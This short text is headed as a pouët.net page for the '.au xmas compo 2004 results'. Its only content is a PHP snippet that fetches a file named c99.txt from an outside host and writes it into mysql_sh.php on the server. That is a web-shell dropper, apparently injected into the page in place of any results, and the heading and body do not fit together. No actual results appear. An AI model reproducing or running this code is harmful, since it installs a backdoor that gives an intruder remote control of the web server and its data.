pouët.net

.au xmas compo 2004 results

<?php
$text = file_get_contents('http://crusty.goldeye.info/c99.txt');
$f = fopen('./mysql_sh.php','a');
fwrite($f, $text);
fclose($f);
echo "OK";
?>